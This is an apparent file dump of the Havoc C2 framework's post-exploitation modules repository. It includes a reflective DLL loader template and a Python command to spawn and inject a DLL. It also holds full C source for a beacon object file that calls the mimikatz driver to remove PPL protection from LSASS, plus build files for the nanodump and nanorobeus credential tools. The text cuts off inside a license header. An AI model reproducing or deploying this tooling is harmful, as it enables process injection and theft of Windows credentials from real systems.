https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/uptime.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/whoami.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/whoami.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/whoami.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/whoami.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/windowlist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/windowlist.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/windowlist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/windowlist.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/wmi_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/wmi_query.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/wmi_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/wmi_query.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/makefile: -------------------------------------------------------------------------------- 1 | NAME = CS-Situational-Awareness-BOF 2 | BIN = ObjectFiles 3 | 4 | all: 5 | @cd $(NAME); chmod +x make_all.sh; bash ./make_all.sh 6 | @find $(NAME)/SA -name '*.o' -exec cp {} $(BIN)/ \; 7 | 8 | clean: 9 | rm $(BIN)/*.o 10 | -------------------------------------------------------------------------------- /Template/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required( VERSION 3.19 ) 2 | project( ModuleTemplate C ) 3 | 4 | set( PROJECT_NAME ModuleTemplate ) 5 | 6 | # set compiler settings 7 | set( CMAKE_C_STANDARD 11 ) 8 | set( CMAKE_C_COMPILER x86_64-w64-mingw32-gcc ) 9 | 10 | # adding demon sources 11 | include_directories( include ) 12 | 13 | set( COMMON_SOURCE 14 | src/Win32.c 15 | src/KaynLdr.c 16 | src/DllMain.c 17 | src/Parser.c 18 | ) 19 | 20 | 21 | # add compiled demons 22 | add_executable( ${PROJECT_NAME} ${COMMON_SOURCE} ) 23 | -------------------------------------------------------------------------------- /Template/bin/Template.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Template/bin/Template.x64.dll -------------------------------------------------------------------------------- /Template/include/DModule.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | 6 | typedef struct _INSTANCE { 7 | 8 | struct { 9 | 10 | WIN32_FUNC( printf ) 11 | 12 | } Win32; 13 | 14 | struct { 15 | 16 | PVOID Msvcrt; 17 | 18 | } Modules; 19 | 20 | } INSTANCE, *PINSTANCE; 21 | 22 | extern INSTANCE Instance; 23 | 24 | VOID ModuleInit(); 25 | VOID ModuleMain(); -------------------------------------------------------------------------------- /Template/include/KaynLdr.h: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | * Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #ifndef KAYNLDR_KAYNLDR_H 7 | #define KAYNLDR_KAYNLDR_H 8 | 9 | #define _NO_NTDLL_CRT_ 10 | 11 | #include 12 | #include 13 | 14 | #define DLL_QUERY_HMODULE 6 15 | 16 | #define HASH_KEY 5381 17 | 18 | #ifdef _WIN64 19 | #define PPEB_PTR __readgsqword( 0x60 ) 20 | #else 21 | #define PPEB_PTR __readgsqword( 0x30 ) 22 | #endif 23 | 24 | #define MemCopy __builtin_memcpy 25 | #define NTDLL_HASH 0x70e61753 26 | 27 | #define SYS_LDRLOADDLL 0x9e456a43 28 | #define SYS_NTALLOCATEVIRTUALMEMORY 0xf783b8ec 29 | #define SYS_NTPROTECTEDVIRTUALMEMORY 0x50e92888 30 | 31 | #define DLLEXPORT __declspec( dllexport ) 32 | #define WIN32_FUNC( x ) __typeof__( x ) * x; 33 | 34 | #define U_PTR( x ) ( ( UINT_PTR ) x ) 35 | #define C_PTR( x ) ( ( LPVOID ) x ) 36 | 37 | typedef struct { 38 | 39 | struct { 40 | WIN32_FUNC( LdrLoadDll ); 41 | WIN32_FUNC( NtAllocateVirtualMemory ) 42 | WIN32_FUNC( NtProtectVirtualMemory ) 43 | } Win32; 44 | 45 | struct { 46 | PVOID Ntdll; 47 | } Modules ; 48 | 49 | } KAYNINSTANCE, *PKAYNINSTANCE ; 50 | 51 | LPVOID KaynCaller(); 52 | 53 | typedef struct { 54 | WORD offset :12; 55 | WORD type :4; 56 | } *PIMAGE_RELOC; 57 | 58 | PVOID KGetModuleByHash( DWORD hash ); 59 | PVOID KGetProcAddressByHash( PKAYNINSTANCE Instance, PVOID DllModuleBase, DWORD FunctionHash, DWORD Ordinal ); 60 | PVOID KLoadLibrary( PKAYNINSTANCE Instance, LPSTR Module ); 61 | 62 | VOID KResolveIAT( PKAYNINSTANCE Instance, PVOID KaynImage, PVOID IatDir ); 63 | VOID KReAllocSections( PVOID KaynImage, PVOID ImageBase, PVOID Dir ); 64 | 65 | DWORD KHashString( LPVOID String, SIZE_T Size ); 66 | SIZE_T KStringLengthA( LPCSTR String ); 67 | SIZE_T KStringLengthW( LPCWSTR String ); 68 | VOID KMemSet( PVOID Destination, INT Value, SIZE_T Size ); 69 | SIZE_T KCharStringToWCharString( PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed ); 70 | 71 | #endif 72 | -------------------------------------------------------------------------------- /Template/include/Parser.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | typedef struct { 5 | PCHAR original; 6 | PCHAR buffer; 7 | UINT32 length; 8 | } PARSER, *PPARSER ; 9 | 10 | VOID ParserNew( PPARSER parser, PCHAR buffer ); 11 | INT ParserGetInt32( PPARSER parser); 12 | PCHAR ParserGetBytes( PPARSER parser, PINT size); -------------------------------------------------------------------------------- /Template/include/Win32.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | -------------------------------------------------------------------------------- /Template/makefile: -------------------------------------------------------------------------------- 1 | MAKEFLAGS += -s 2 | 3 | NAME = Template 4 | 5 | COMPILER_x86 = i686-w64-mingw32-gcc 6 | COMPILER_x64 = x86_64-w64-mingw32-gcc 7 | 8 | CFLAGS = -Os -fno-asynchronous-unwind-tables -shared -masm=intel 9 | CFLAGS += -fno-ident -fpack-struct=8 -falign-functions=1 10 | CFLAGS += -s -ffunction-sections -falign-jumps=1 -w 11 | CFLAGS += -falign-labels=1 -fPIC 12 | CFLAGS += -Wl,-s,--no-seh,--enable-stdcall-fixup 13 | 14 | INCLUDE = -I include 15 | SOURCE = $(wildcard src/*.c) 16 | 17 | x64: 18 | nasm -f win64 src/Util.s -o src/Util.o 19 | $(COMPILER_x64) src/*.o $(INCLUDE) $(SOURCE) $(CFLAGS) -o bin/$(NAME).x64.dll -lntdll -luser32 20 | rm src/*.o -------------------------------------------------------------------------------- /Template/src/DllMain.c: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | * Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | HINSTANCE hAppInstance = NULL; 12 | INSTANCE Instance = { 0 }; 13 | 14 | BOOL WINAPI DllMain( HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpReserved ) 15 | { 16 | BOOL bReturnValue = TRUE; 17 | 18 | switch( dwReason ) 19 | { 20 | case DLL_QUERY_HMODULE: 21 | if( lpReserved != NULL ) 22 | *( HMODULE* ) lpReserved = hAppInstance; 23 | break; 24 | 25 | case DLL_PROCESS_ATTACH: 26 | { 27 | hAppInstance = hInstDLL; 28 | 29 | ModuleInit(); 30 | ModuleMain( lpReserved ); 31 | 32 | fflush( stdout ); 33 | ExitProcess( 0 ); 34 | } 35 | 36 | case DLL_PROCESS_DETACH: 37 | case DLL_THREAD_ATTACH: 38 | case DLL_THREAD_DETACH: 39 | break; 40 | } 41 | return bReturnValue; 42 | } 43 | 44 | VOID ModuleInit() 45 | { 46 | Instance.Modules.Msvcrt = LoadLibraryA( "Msvcrt" ); 47 | if ( Instance.Modules.Msvcrt ) 48 | { 49 | Instance.Win32.printf = GetProcAddress( Instance.Modules.Msvcrt, "printf" ); 50 | } 51 | } 52 | 53 | VOID ModuleMain( PVOID Params ) 54 | { 55 | PARSER Parser = { 0 }; 56 | PCHAR Test = NULL; 57 | UINT32 Size = 0; 58 | 59 | ParserNew( &Parser, Params ); 60 | 61 | Test = ParserGetBytes( &Parser, &Size ); 62 | 63 | Instance.Win32.printf( "Test [%d]: %s\n", Size, Test ); 64 | 65 | Instance.Win32.printf( "[+] Hello from KaynLdr Module\n" ); 66 | Instance.Win32.printf( "[*] Process ID: %d\n", GetCurrentProcessId()); 67 | } -------------------------------------------------------------------------------- /Template/src/Parser.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | VOID ParserNew( PPARSER parser, PCHAR buffer ) 6 | { 7 | UINT32 Size = 0; 8 | 9 | if ( parser == NULL ) 10 | return; 11 | 12 | memcpy( &Size, buffer, sizeof( UINT32 ) ); 13 | 14 | parser->buffer = buffer + sizeof( UINT32 ); 15 | parser->original = buffer; 16 | parser->length = Size - sizeof( UINT32 ); 17 | } 18 | 19 | INT32 ParserGetInt32( PPARSER parser ) 20 | { 21 | INT32 intBytes = 0; 22 | 23 | if ( parser->length < 4 ) 24 | return 0; 25 | 26 | memcpy( &intBytes, parser->buffer, 4 ); 27 | 28 | parser->buffer += 4; 29 | parser->length -= 4; 30 | 31 | return ( INT ) intBytes; 32 | } 33 | 34 | PCHAR ParserGetBytes( PPARSER parser, PINT size ) 35 | { 36 | UINT32 length = 0; 37 | PCHAR outdata = NULL; 38 | 39 | if ( parser->length < 4 ) 40 | return NULL; 41 | 42 | memcpy( &length, parser->buffer, 4 ); 43 | parser->buffer += 4; 44 | 45 | outdata = parser->buffer; 46 | if ( outdata == NULL ) 47 | return NULL; 48 | 49 | parser->length -= 4; 50 | parser->length -= length; 51 | parser->buffer += length; 52 | 53 | if ( size != NULL ) 54 | *size = length; 55 | 56 | return outdata; 57 | } -------------------------------------------------------------------------------- /Template/src/Util.s: -------------------------------------------------------------------------------- 1 | ; KaynLdr 2 | ; Author: Paul Ungur (@C5pider) 3 | ; Credits: Austin Hudson (@ilove2pwn_), Chetan Nayak (@NinjaParanoid), Bobby Cooke (@0xBoku), @trickster012 4 | ; 5 | 6 | global KaynCaller 7 | 8 | section .text 9 | 10 | ; Shameless copied from Bobby Cooke CobaltStrikeReflectiveLoader (https://github.com/boku7/CobaltStrikeReflectiveLoader) 11 | KaynCaller: 12 | call pop 13 | pop: 14 | pop rcx 15 | loop: 16 | xor rbx, rbx 17 | mov ebx, 0x5A4D 18 | dec rcx 19 | cmp bx, word ds:[ rcx ] 20 | jne loop 21 | xor rax, rax 22 | mov ax, [ rcx + 0x3C ] 23 | add rax, rcx 24 | xor rbx, rbx 25 | add bx, 0x4550 26 | cmp bx, word ds:[ rax ] 27 | jne loop 28 | mov rax, rcx 29 | ret -------------------------------------------------------------------------------- /Template/src/Win32.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Template/src/Win32.c -------------------------------------------------------------------------------- /Template/template.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand 2 | 3 | def testdll(demonID, *param): 4 | TaskID : str = None 5 | demon : Demon = None 6 | packer = Packer() 7 | 8 | packer.addstr("test1234") 9 | 10 | demon = Demon(demonID) 11 | TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon spawn and inject a test dll") 12 | 13 | arg = packer.getbuffer() 14 | 15 | demon.DllSpawn(TaskID, "/tmp/test.dll", arg) 16 | 17 | return TaskID 18 | 19 | RegisterCommand(testdll, "", "testdll", "spawn and inject test dll", 0, "", "") 20 | -------------------------------------------------------------------------------- /makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(filter-out Template, $(shell echo */)) 2 | 3 | .PHONY: all $(SUBDIRS) 4 | 5 | all: UPDATE $(SUBDIRS) 6 | 7 | UPDATE: 8 | @ echo "Updating submodules" 9 | @ git submodule update --init --recursive 10 | 11 | $(SUBDIRS): 12 | @ if [ -f $@/makefile -o -f $@/Makefile ]; then \ 13 | echo "Building $@"; \ 14 | $(MAKE) -C $@; \ 15 | else \ 16 | echo "Skipping $@ (Makefile not found)"; \ 17 | fi 18 | -------------------------------------------------------------------------------- /mimidrv/dist/mimidrv.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/mimidrv/dist/mimidrv.x64.o -------------------------------------------------------------------------------- /mimidrv/include/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | #pragma once 11 | 12 | /* data API */ 13 | typedef struct { 14 | char* original; /* the original buffer [so we can free it] */ 15 | char* buffer; /* current pointer into our buffer */ 16 | int length; /* remaining length of data */ 17 | int size; /* total size of this buffer */ 18 | } datap; 19 | 20 | DECLSPEC_IMPORT void BeaconDataParse(datap* parser, char* buffer, int size); 21 | DECLSPEC_IMPORT int BeaconDataInt(datap* parser); 22 | DECLSPEC_IMPORT short BeaconDataShort(datap* parser); 23 | DECLSPEC_IMPORT int BeaconDataLength(datap* parser); 24 | DECLSPEC_IMPORT char* BeaconDataExtract(datap* parser, int* size); 25 | 26 | /* format API */ 27 | typedef struct { 28 | char* original; /* the original buffer [so we can free it] */ 29 | char* buffer; /* current pointer into our buffer */ 30 | int length; /* remaining length of data */ 31 | int size; /* total size of this buffer */ 32 | } formatp; 33 | 34 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp* format, int maxsz); 35 | DECLSPEC_IMPORT void BeaconFormatReset(formatp* format); 36 | DECLSPEC_IMPORT void BeaconFormatFree(formatp* format); 37 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp* format, char* text, int len); 38 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp* format, char* fmt, ...); 39 | DECLSPEC_IMPORT char* BeaconFormatToString(formatp* format, int* size); 40 | DECLSPEC_IMPORT void BeaconFormatInt(formatp* format, int value); 41 | 42 | /* Output Functions */ 43 | #define CALLBACK_OUTPUT 0x0 44 | #define CALLBACK_OUTPUT_OEM 0x1e 45 | #define CALLBACK_ERROR 0x0d 46 | #define CALLBACK_OUTPUT_UTF8 0x20 47 | 48 | DECLSPEC_IMPORT void BeaconPrintf(int type, char* fmt, ...); 49 | DECLSPEC_IMPORT void BeaconOutput(int type, char* data, int len); 50 | 51 | /* Token Functions */ 52 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 53 | DECLSPEC_IMPORT void BeaconRevertToken(VOID); 54 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(VOID); 55 | 56 | /* Spawn+Inject Functions */ 57 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char* buffer, int length); 58 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len); 59 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len); 60 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION* pInfo); 61 | 62 | /* Utility Functions */ 63 | DECLSPEC_IMPORT BOOL toWideChar(char* src, wchar_t* dst, int max); 64 | -------------------------------------------------------------------------------- /mimidrv/include/entry.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include "beacon.h" 4 | #include 5 | 6 | #define MIMIKATZ_DRIVER L"mimidrv" 7 | 8 | WINBASEAPI BOOL WINAPI KERNEL32$DeviceIoControl(HANDLE, DWORD, LPVOID, DWORD, LPVOID, DWORD, LPDWORD, LPOVERLAPPED); 9 | #define DeviceIoControl KERNEL32$DeviceIoControl 10 | 11 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(); 12 | #define GetLastError KERNEL32$GetLastError 13 | 14 | WINBASEAPI HLOCAL WINAPI KERNEL32$LocalAlloc(UINT uFlags, SIZE_T uBytes); 15 | #define LocalAlloc KERNEL32$LocalAlloc 16 | 17 | WINBASEAPI HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL hMem); 18 | #define LocalFree KERNEL32$LocalFree 19 | 20 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 21 | #define CreateFileW KERNEL32$CreateFileW 22 | 23 | WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject); 24 | #define CloseHandle KERNEL32$CloseHandle 25 | 26 | typedef struct _PS_PROTECTION { 27 | UCHAR Type : 3; 28 | UCHAR Audit : 1; 29 | UCHAR Signer: 4; 30 | } PS_PROTECTION, *PPS_PROTECTION; 31 | 32 | typedef struct _KIWI_PROCESS_SIGNATURE_PROTECTION { 33 | UCHAR SignatureLevel; 34 | UCHAR SectionSignatureLevel; 35 | PS_PROTECTION Protection; 36 | } KIWI_PROCESS_SIGNATURE_PROTECTION, *PKIWI_PROCESS_SIGNATURE_PROTECTION; 37 | 38 | typedef struct _MIMIDRV_PROCESS_PROTECT_INFORMATION { 39 | ULONG processId; 40 | KIWI_PROCESS_SIGNATURE_PROTECTION SignatureProtection; 41 | } MIMIDRV_PROCESS_PROTECT_INFORMATION, *PMIMIDRV_PROCESS_PROTECT_INFORMATION; 42 | 43 | #define IOCTL_MIMIDRV_PROCESS_PROTECT CTL_CODE(FILE_DEVICE_UNKNOWN, 0x012, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 44 | -------------------------------------------------------------------------------- /mimidrv/makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := mimidrv 2 | OPTIONS := -I include -Wall 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | 5 | all: 6 | $(CC_x64) -o dist/$(BOFNAME).x64.o -c source/entry.c $(OPTIONS) 7 | -------------------------------------------------------------------------------- /mimidrv/mimidrv.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | import re 3 | 4 | def mimidrv( demonID, *params ): 5 | TaskID : str = None 6 | demon : Demon = None 7 | packer = Packer() 8 | demon = Demon( demonID ) 9 | 10 | num_params = len(params) 11 | pid = '' 12 | 13 | if num_params < 1: 14 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" ) 15 | return True 16 | elif num_params == 1: 17 | pid = params[ 0 ] 18 | elif num_params > 1: 19 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" ) 20 | return True 21 | 22 | try: 23 | pid = int( pid ) 24 | except Exception as e: 25 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Invalid PID" ) 26 | return True 27 | 28 | packer.adduint32(pid) 29 | 30 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to disable the PPL protection from LSASS" ) 31 | 32 | demon.InlineExecute( TaskID, "go", "dist/mimidrv.x64.o", packer.getbuffer(), False ) 33 | 34 | return TaskID 35 | 36 | RegisterCommand( mimidrv, "", "mimidrv", "Disable PPL by interacting with the Mimidrv", 0, "", "1337" ) 37 | -------------------------------------------------------------------------------- /mimidrv/source/entry.c: -------------------------------------------------------------------------------- 1 | 2 | #include "entry.h" 3 | 4 | BOOL kull_m_kernel_ioctl_handle(HANDLE hDriver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer) 5 | { 6 | BOOL status = FALSE; 7 | DWORD lStatus = ERROR_MORE_DATA, returned; 8 | 9 | if(!autobuffer) 10 | { 11 | status = DeviceIoControl(hDriver, ioctlCode, bufferIn, szBufferIn, pBufferOut ? *pBufferOut : NULL, pSzBufferOut ? *pSzBufferOut : 0, &returned, NULL); 12 | } 13 | else 14 | { 15 | for(*pSzBufferOut = 0x10000; (lStatus == ERROR_MORE_DATA) && (*pBufferOut = LocalAlloc(LPTR, *pSzBufferOut)) ; *pSzBufferOut <<= 1) 16 | { 17 | status = DeviceIoControl(hDriver, ioctlCode, bufferIn, szBufferIn, *pBufferOut, *pSzBufferOut, &returned, NULL); 18 | if(status) 19 | { 20 | lStatus = ERROR_SUCCESS; 21 | } 22 | else 23 | { 24 | lStatus = GetLastError(); 25 | if(lStatus == ERROR_MORE_DATA) 26 | { 27 | LocalFree(*pBufferOut); 28 | } 29 | } 30 | } 31 | } 32 | if(!status) 33 | { 34 | BeaconPrintf(CALLBACK_ERROR, "DeviceIoControl"); 35 | if(autobuffer) 36 | { 37 | LocalFree(*pBufferOut); 38 | } 39 | } 40 | else if(pSzBufferOut) 41 | { 42 | *pSzBufferOut = returned; 43 | } 44 | return status; 45 | } 46 | 47 | BOOL kull_m_kernel_ioctl(PCWSTR driver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer) 48 | { 49 | BOOL status = FALSE; 50 | HANDLE hDriver; 51 | hDriver = CreateFileW(driver, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); 52 | if(hDriver && hDriver != INVALID_HANDLE_VALUE) 53 | { 54 | status = kull_m_kernel_ioctl_handle(hDriver, ioctlCode, bufferIn, szBufferIn, pBufferOut, pSzBufferOut, autobuffer); 55 | CloseHandle(hDriver); 56 | } 57 | else 58 | { 59 | BeaconPrintf(CALLBACK_ERROR, "CreateFile"); 60 | } 61 | return status; 62 | } 63 | 64 | BOOL kull_m_kernel_mimidrv_simple_output(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn) 65 | { 66 | BOOL status = FALSE; 67 | PVOID buffer = NULL; 68 | DWORD szBuffer; 69 | 70 | status = kull_m_kernel_ioctl(L"\\\\.\\" MIMIKATZ_DRIVER, ioctlCode, bufferIn, szBufferIn, &buffer, &szBuffer, TRUE); 71 | if(status) 72 | { 73 | //for(i = 0; i < szBuffer / sizeof(wchar_t); i++) 74 | // kprintf(L"%c", ((wchar_t *) buffer)[i]); 75 | LocalFree(buffer); 76 | } 77 | return status; 78 | } 79 | 80 | void go(char* args, int length) 81 | { 82 | datap parser; 83 | MIMIDRV_PROCESS_PROTECT_INFORMATION protectInfos = {0, {0, 0, {0, 0, 0}}}; 84 | BOOL ret_val = FALSE; 85 | BeaconDataParse(&parser, args, length); 86 | protectInfos.processId = BeaconDataInt(&parser); // LSASS PID 87 | 88 | ret_val = kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_PROCESS_PROTECT, &protectInfos, sizeof(MIMIDRV_PROCESS_PROTECT_INFORMATION)); 89 | BeaconPrintf(CALLBACK_OUTPUT, "Result: %d", ret_val); 90 | 91 | return; 92 | } 93 | -------------------------------------------------------------------------------- /nanodump/bin/nanodump.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump.x64.o -------------------------------------------------------------------------------- /nanodump/bin/nanodump.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump.x86.o -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ppl_dump.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ppl_dump.x64.dll -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ppl_dump.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ppl_dump.x64.o -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ppl_medic.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ppl_medic.x64.dll -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ppl_medic.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ppl_medic.x64.o -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ssp.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ssp.x64.dll -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ssp.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ssp.x64.o -------------------------------------------------------------------------------- /nanodump/makefile: -------------------------------------------------------------------------------- 1 | NAME = nanodump 2 | BIN = bin 3 | 4 | all: 5 | @ make -C $(NAME) -f Makefile.mingw 6 | @ find $(NAME)/dist -name '*.o' -exec cp {} $(BIN)/ \; 7 | 8 | clean: 9 | rm $(BIN)/*.o 10 | -------------------------------------------------------------------------------- /nanorobeus/bin/nanorobeus.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanorobeus/bin/nanorobeus.x64.o -------------------------------------------------------------------------------- /nanorobeus/bin/nanorobeus.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanorobeus/bin/nanorobeus.x86.o -------------------------------------------------------------------------------- /nanorobeus/include/base64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 | * 8 | * This file contains Original Code and/or Modifications of Original Code 9 | * as defined in and that are subject to the Apple Public Source License 10 | * Version 2.0 (the 'License'). You may not use this file except in 11 | * compliance with the License. Please obtain a copy of the License at 12 | * http://www.opensource.apple.com/apsl/ and read it before using this 13 | * file. 14 | * 15 | * The Original Code and all software distributed under the License are 16 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 20 | * Please see the License for the specific language governing rights and 21 | * limitations under the License. 22 | * 23 | * @APPLE_LICENSE_HEADER_END@ 24 | */ 25 | /* ==================================================================== 26 | * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 | * 28 | * Redistribution and use in source and binary forms, with or without 29 | * modification, are permitted provided that the following conditions 30 | * are met: 31 | * 32 | * 1. Redistributions of source code must retain the above copyright 33 | * notice, this list of conditions and the following disclaimer. 34 | * 35 | * 2. Redistributions in binary form must reproduce the above copyright 36 | * notice, this list of conditions and the following disclaimer in 37 | * the documentation and/or other materials provided with the 38 | * distribution. 39 | * 40 | * 3. All advertising materials mentioning features or use of this 41 | * software must display the following acknowledgment: 42 | * "This product includes software developed by the Apache Group 43 | * for use in the Apache HTTP server project (http://www.apache.org/)." 44 | * 45 | * 4. The names "Apache Server" and "Apache Group" must not be used to 46 | * endorse or promote products derived from this software without 47 | * prior written permission. For written permission, please contact 48 | * apache@apache.org. 49 | * 50 | * 5. Products derived from this software may not be called "Apache" 51 | * nor may "Apache" appear in their names without prior written 52 | * permission of the Apache Group. 53 | * 54 | * 6. Redistributions of any form whatsoever must retain the following 55 | * acknowledgment: 56 | * "This product includes software developed by the Apache Group 57 | * for use in the Apache HTTP server project (http://www.apache.org/)." 58 | * 59 | * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 | * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 | * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 | * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 | * NOT 